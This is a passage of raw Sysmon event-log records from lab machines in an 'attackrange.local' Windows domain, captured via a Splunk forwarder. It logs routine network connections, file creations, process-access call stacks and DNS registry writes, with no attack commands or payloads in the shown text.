Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E714496D4EB7CC0AC186ABE1256525,SHA256=716B80D82B593CD9FC76BEEA28490BA0C123A274114A5986F15F08094479FEA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.727{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-22438-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001052959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.644{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55075- 23542300x80000000000000001052958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FD66ACA2882A7CECB1122B9630C465,SHA256=36AEDA40905530DAD058B1AF36FCAA0BC0E0A82143A583F5A730CC87D27DE5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C323C23A756A70E72731C1B79214817C,SHA256=7D50AA5AD86D40CE4B6CA35DD17BFB4914710D63897564C3A791D96C963D8B36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.972{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.972{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.511{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:98c0:7b90:86bb:ffff-53248-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000001052968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.511{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local53248-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000001052967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.505{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x80000000000000001052966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.465{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.397{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.397{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:03:06.389{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.433.128717824C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:03:06.389{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.433.128717824C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33985BBB3B34B0D441853166A923B4CF,SHA256=61225EFA72B2079CC903BB6461A8418B90E249298E0B68AB6ACD73D7B189162C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:07.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BCE1CE55BDECCA61E75E5E0E00CBF7,SHA256=02C59354D4312070E4C5B50A41543B489DE77BF09BEDCD6D4E6C177D42C85DA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:59.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51180-false10.0.1.12-8000- 734700x80000000000000001052991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.111{466BC892-F73A-60EB-C27D-00000000CF01}9972C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000001052990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001052989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\StaleAdapterDWORD (0x00000000) 13241300x80000000000000001052988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001052987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\FlagsDWORD (0x00000002) 13241300x80000000000000001052986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\TtlDWORD (0x000004b0) 13241300x80000000000000001052985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\SentPriUpdateToIpBinary Data 13241300x80000000000000001052984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\SentUpdateToIpBinary Data 13241300x80000000000000001052983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\DnsServersBinary Data 13241300x80000000000000001052982Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\HostAddrsBinary Data 13241300x80000000000000001052981Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\PrimaryDomainNameattackrange.local 13241300x80000000000000001052980Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\AdapterDomainName(Empty) 13241300x80000000000000001052979Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\Hostnamewin-dc-890 23542300x80000000000000001052978Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0642138E608C5D97085D5E16769348D1,SHA256=8A1287A0B4E4C57D6C0F93582245EF4B57C4F935D304DABE6ED2F7EA4E58F146,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809515Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:05.306{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57403-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001052977Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.009{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+304a5|C:\Windows\system32\lsasrv.dll+2e33b|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x80000000000000001052976Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.009{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\RegisteredSinceBootDWORD (0x00000001) 23542300x8000000000000000809517Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:08.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8565729E13F3F3E09A70C4B67CEFD10E,SHA256=E1FEECE599FB6D8C1B1389ECCA63F6D8EDE74983CCF2A61BB8C9C49602F6C69C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.683{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local61897-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001053012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:00.666{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 